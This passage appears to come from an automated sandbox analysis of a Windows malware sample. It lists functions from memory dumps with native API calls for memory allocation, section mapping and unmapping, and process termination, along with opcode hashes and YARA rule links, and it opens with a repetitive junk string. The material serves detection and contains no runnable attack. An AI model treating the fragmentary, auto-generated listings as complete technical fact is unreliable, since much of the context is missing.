$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~
                                      • API String ID: 1874947323-1702606078
                                      • Opcode ID: 5d3bfe5a52da1de0717a5631573d7bda9d14d7362bd43b5e2efa125e795c9966
                                      • Instruction ID: 19b965e24c68f8e77dd423bec0d40db95f6de2d8cf51c259cc2b2df96df387d7
                                      • Opcode Fuzzy Hash: 5d3bfe5a52da1de0717a5631573d7bda9d14d7362bd43b5e2efa125e795c9966
                                      • Instruction Fuzzy Hash: CB745B1090CBEAC8DB32827C5C587CDAE611B23324F4843D9D1ED2A6D6C7B50B96DF66
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00457B08, Relevance: 17.7, APIs: 11, Instructions: 1216COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 58fe25780cbd1d5dd60044fa9f6225bcfda5603850e4de2d90baa676da930ecf
                                      • Instruction ID: bde56d12ca5bb9c6d770660d3a398e1d156253e6f7e2bbb1f69f1efc8eadc098
                                      • Opcode Fuzzy Hash: 58fe25780cbd1d5dd60044fa9f6225bcfda5603850e4de2d90baa676da930ecf
                                      • Instruction Fuzzy Hash: A5B22DB1D00218EFEB14DF94CC45BEEB7B5AB48305F10819EE905BB281DB789A89CF55
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0045D928, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID: @
                                      • API String ID: 0-2766056989
                                      • Opcode ID: cdb2f8260c3cfb50a0a7dfa647fcfbaac2fccda0868779c582bc9bfff14ce8ab
                                      • Instruction ID: 3f0928541dba01ac92b8120503356443777dc11c91edacb79c44d10ad37986f2
                                      • Opcode Fuzzy Hash: cdb2f8260c3cfb50a0a7dfa647fcfbaac2fccda0868779c582bc9bfff14ce8ab
                                      • Instruction Fuzzy Hash: 4A413D75A50209BFEB14CF94CC81FAEB7B5AF48700F108558FA15AB2C1D7B4AA44CB98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004579E8, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 105filenativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtCreateFile.NTDLL(?,80100000,00000018,?,00000000,00000080,00000007,00000001,00000060,00000000,00000000), ref: 00457A79
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID: @
                                      • API String ID: 823142352-2766056989
                                      • Opcode ID: fcce1b8f83ce6098c17e5add9eb751c495a580ee7a9faf8ac2add711d0234b4c
                                      • Instruction ID: b52fd7ab4216ace9291fdb69c2fc9cc39b5326c748824256ac214eb508547c72
                                      • Opcode Fuzzy Hash: fcce1b8f83ce6098c17e5add9eb751c495a580ee7a9faf8ac2add711d0234b4c
                                      • Instruction Fuzzy Hash: 35415C75A50208BFDB04CF94DC85FEEB7B9AF48710F208158FA04AB2D0D7B4AA05CB94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0045D728, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 164COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID: @
                                      • API String ID: 0-2766056989
                                      • Opcode ID: 3cc6f16a382698ea9cc30287e394aa241eed86385e281fa8b7b9b80aab4f7af6
                                      • Instruction ID: 57a13579ba11a278d2e7fa09c48eef1b7bfee6ab90226924f1fe4068834d2991
                                      • Opcode Fuzzy Hash: 3cc6f16a382698ea9cc30287e394aa241eed86385e281fa8b7b9b80aab4f7af6
                                      • Instruction Fuzzy Hash: 96517270A10209EFEB14DFA4CC41FEE77B5AF48700F108529E619EB2C1E775AA45CB99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044D2B5, Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetVersion.KERNEL32(?,?,?,0044D2B0), ref: 0044D32C
                                      • GetProcessVersion.KERNELBASE(00000000,?,?,?,0044D2B0), ref: 0044D369
                                      • LoadCursorA.USER32 ref: 0044D397
                                      • LoadCursorA.USER32 ref: 0044D3A2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: CursorLoadVersion$Process
                                      • String ID:
                                      • API String ID: 2246821583-0
                                      • Opcode ID: 8778639b6834b464474c85e07c46324646b71cd104574dd48b9071a3e6428b87
                                      • Instruction ID: 02910b2bc9ab1dbca71b887cf845d1d80e8ca0c56a18376b08520561ce7e29b3
                                      • Opcode Fuzzy Hash: 8778639b6834b464474c85e07c46324646b71cd104574dd48b9071a3e6428b87
                                      • Instruction Fuzzy Hash: A31128B1A00B508FE7249F3A889462ABAE5FB48705740493FE18BC6B91D778E4408B94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00458A28, Relevance: 4.7, APIs: 3, Instructions: 159nativefileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 00458AA7
                                      • NtCreateSection.NTDLL(00000000,000F001F,00000000,00000000,00000002,01000000,?), ref: 00458ADF
                                      • NtClose.NTDLL(?,?,00000001,?,00000030,00000000,?,00000001), ref: 00458B73
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: CloseCreateFileSectionWrite
                                      • String ID:
                                      • API String ID: 2349782792-0
                                      • Opcode ID: 701d89797e0bb8792af7d360e5ea09c4bc7bfdf99c1c12c2fa203f4917575bf1
                                      • Instruction ID: 5efd40b3823e7c82bbe5598262c4189c1b2f68b3be001014db80e654cdd877c4
                                      • Opcode Fuzzy Hash: 701d89797e0bb8792af7d360e5ea09c4bc7bfdf99c1c12c2fa203f4917575bf1
                                      • Instruction Fuzzy Hash: E061DAB4A00209EFDB04CF54C885BAAB7B5BF48315F14815EF815AB391CB79E985CF94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00458097, Relevance: 4.6, APIs: 3, Instructions: 73nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtClose.NTDLL(00000000), ref: 0045899C
                                      • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 00458A05
                                      • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 00458A17
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: CloseFreeMemorySectionUnmapViewVirtual
                                      • String ID:
                                      • API String ID: 3320349860-0
                                      • Opcode ID: 188f8b6f1d376f19d687f11c21be0d03f228e20fd9304d7282a8211628cc8c36
                                      • Instruction ID: 0f8df6fcb5a946715e9477fa658ae907b84e29e6f754b46915cf54ccc20aae27
                                      • Opcode Fuzzy Hash: 188f8b6f1d376f19d687f11c21be0d03f228e20fd9304d7282a8211628cc8c36
                                      • Instruction Fuzzy Hash: 23312971900218EBEF24CB90CC49BEEB775AB44316F24828EA519762C1CF785EC9CF16
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0045838A, Relevance: 4.6, APIs: 3, Instructions: 68nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtClose.NTDLL(00000000), ref: 0045899C
                                      • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 00458A05
                                      • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 00458A17
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: CloseFreeMemorySectionUnmapViewVirtual
                                      • String ID:
                                      • API String ID: 3320349860-0
                                      • Opcode ID: af932d642f6ad79af75f5b463a93244e82566cd67f8d0da9e2d64c393f9b7829
                                      • Instruction ID: 8a43374c92160f5a232f00476961667220aede0b54790bc7504df2cbc973e21b
                                      • Opcode Fuzzy Hash: af932d642f6ad79af75f5b463a93244e82566cd67f8d0da9e2d64c393f9b7829
                                      • Instruction Fuzzy Hash: 47211971900218EBDF24CB90CD48BEEB775AB45302F24828EA919762C1CF784EC8CF56
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004574D8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 109COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID: @
                                      • API String ID: 0-2766056989
                                      • Opcode ID: cd402a352ddc17dd51bfb3b8dffc53a547eeeeb8e77fedd15555b077d7eeb747
                                      • Instruction ID: 93bfc8f8803c6ab3c5d65488bad2a655c48af14d5396daebe944a0dda7bc6f70
                                      • Opcode Fuzzy Hash: cd402a352ddc17dd51bfb3b8dffc53a547eeeeb8e77fedd15555b077d7eeb747
                                      • Instruction Fuzzy Hash: 59413F70A04208EFDB10CF54D844BDEBBB5BF44315F108169E905AB3C1D7B8AA89CB94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0045B4DD, Relevance: 1.6, APIs: 1, Instructions: 144nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtTerminateProcess.NTDLL(000000FF,00000000), ref: 0045B69D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: ProcessTerminate
                                      • String ID:
                                      • API String ID: 560597551-0
                                      • Opcode ID: 5e74648f8415b3abc1f55e738af89c7949e93b21fbc3e0da6157c83b2565cb6c
                                      • Instruction ID: 61ecd58f3afe401d945d68bb22aeb896a75187722e600e7a069ffe4499fb5b07
                                      • Opcode Fuzzy Hash: 5e74648f8415b3abc1f55e738af89c7949e93b21fbc3e0da6157c83b2565cb6c
                                      • Instruction Fuzzy Hash: C54131F2C00208AADF14DAA5DC52BEE76789B14306F14455BFD05A6182EB38965CCBAA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00457368, Relevance: 1.6, APIs: 1, Instructions: 106memorynativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00007FFF,00003000,00000004), ref: 00457431
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: AllocateMemoryVirtual
                                      • String ID:
                                      • API String ID: 2167126740-0
                                      • Opcode ID: f77cc96f017cc8017b84092f26def4058ec2b7d052b5dc15642f4a535b3c0d2d
                                      • Instruction ID: 5a01782c8915b1036d6b8120d5068adaa8798689a06163710366a6033a1bd840
                                      • Opcode Fuzzy Hash: f77cc96f017cc8017b84092f26def4058ec2b7d052b5dc15642f4a535b3c0d2d
                                      • Instruction Fuzzy Hash: F5416D74E14208EBDB04DFA4D840BDEB776EF58300F209129E519EB390E7799E05CB69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0043BAD2, Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNELBASE(Function_0003BA8C), ref: 0043BAD7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: d3cc8c2acf79cdad4b157809c996d2d7bdd8f6f47901dc6ddb981acf445a2862
                                      • Instruction ID: bd58d953401e6158f77e69219718a5e42049e2034aafe8c5a644c12568a89ba1
                                      • Opcode Fuzzy Hash: d3cc8c2acf79cdad4b157809c996d2d7bdd8f6f47901dc6ddb981acf445a2862
                                      • Instruction Fuzzy Hash: 12A001B4942B008B87107BA8A8096093AA0AA48652B5112A6A69582679EB6440809A5A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044CD1E, Relevance: 15.1, APIs: 10, Instructions: 99memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • EnterCriticalSection.KERNEL32(0047129C,00471264,00000000,?,00471280,00471280,0044D0B9,?,00000000,0044C696,0044BFA0,0044C6B2,00448804,0044A2B4,?,00000000), ref: 0044CD2D
                                      • GlobalAlloc.KERNELBASE(00002002,00000000,?,?,00471280,00471280,0044D0B9,?,00000000,0044C696,0044BFA0,0044C6B2,00448804,0044A2B4,?,00000000), ref: 0044CD82
                                      • GlobalHandle.KERNEL32(00741E08), ref: 0044CD8B
                                      • GlobalUnlock.KERNEL32(00000000,?,?,00471280,00471280,0044D0B9,?,00000000,0044C696,0044BFA0,0044C6B2,00448804,0044A2B4,?,00000000), ref: 0044CD94
                                      • GlobalReAlloc.KERNEL32 ref: 0044CDA6
                                      • GlobalHandle.KERNEL32(00741E08), ref: 0044CDBD
                                      • GlobalLock.KERNEL32 ref: 0044CDC4
                                      • LeaveCriticalSection.KERNEL32(004368AB,?,?,00471280,00471280,0044D0B9,?,00000000,0044C696,0044BFA0,0044C6B2,00448804,0044A2B4,?,00000000), ref: 0044CDCA
                                      • GlobalLock.KERNEL32 ref: 0044CDD9
                                      • LeaveCriticalSection.KERNEL32(?), ref: 0044CE22
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
                                      • String ID:
                                      • API String ID: 2667261700-0
                                      • Opcode ID: ad6d95207c2c6c475d026028da1bef78df2ae27aba095f734871a2018bb70ace
                                      • Instruction ID: 41b8a22e85fa85e2cbe44c46998bc1cfe792355f624ada439946733bb8e5c358
                                      • Opcode Fuzzy Hash: ad6d95207c2c6c475d026028da1bef78df2ae27aba095f734871a2018bb70ace
                                      • Instruction Fuzzy Hash: 6431D2B16007059FE7209F28DC89A2ABBE8FB44305F044A7EF456C3662E775E8048B54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00449084, Relevance: 9.0, APIs: 6, Instructions: 35COMMON
                                      Download Yara Rule
                                      APIs
                                      • KiUserCallbackDispatcher.NTDLL ref: 00449091
                                      • GetSystemMetrics.USER32 ref: 00449098
                                      • GetDC.USER32(00000000), ref: 004490B1
                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 004490C2
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004490CA
                                      • ReleaseDC.USER32 ref: 004490D2
                                        • Part of subcall function 0044D2D5: GetSystemMetrics.USER32 ref: 0044D2E7
                                        • Part of subcall function 0044D2D5: GetSystemMetrics.USER32 ref: 0044D2F1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: MetricsSystem$CapsDevice$CallbackDispatcherReleaseUser
                                      • String ID:
                                      • API String ID: 1031845853-0
                                      • Opcode ID: ce0827bbda45220ec8f21835fb4f738b432ddd7621062c90d7957bf90e013a17
                                      • Instruction ID: de015884d07a70655cd762315a7e791271baf7ebf5b9c814233db0a9f052ac6b
                                      • Opcode Fuzzy Hash: ce0827bbda45220ec8f21835fb4f738b432ddd7621062c90d7957bf90e013a17
                                      • Instruction Fuzzy Hash: 05F054305407009AF7206B729C4DF1B77A4EB91B56F11452EE601466E1DAB5DC01CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004396E5, Relevance: 6.1, APIs: 4, Instructions: 53memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • HeapReAlloc.KERNEL32(00000000,00000060,00000000,00000000,004394AD,00000000,?,?,?,0043683B), ref: 0043970D
                                      • RtlAllocateHeap.NTDLL(00000008,000041C4,00000000,00000000,004394AD,00000000,?,?,?,0043683B), ref: 00439741
                                      • VirtualAlloc.KERNELBASE(00000000,00100000,00002000,00000004,?,0043683B), ref: 0043975B
                                      • HeapFree.KERNEL32(00000000,?,?,0043683B), ref: 00439772
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
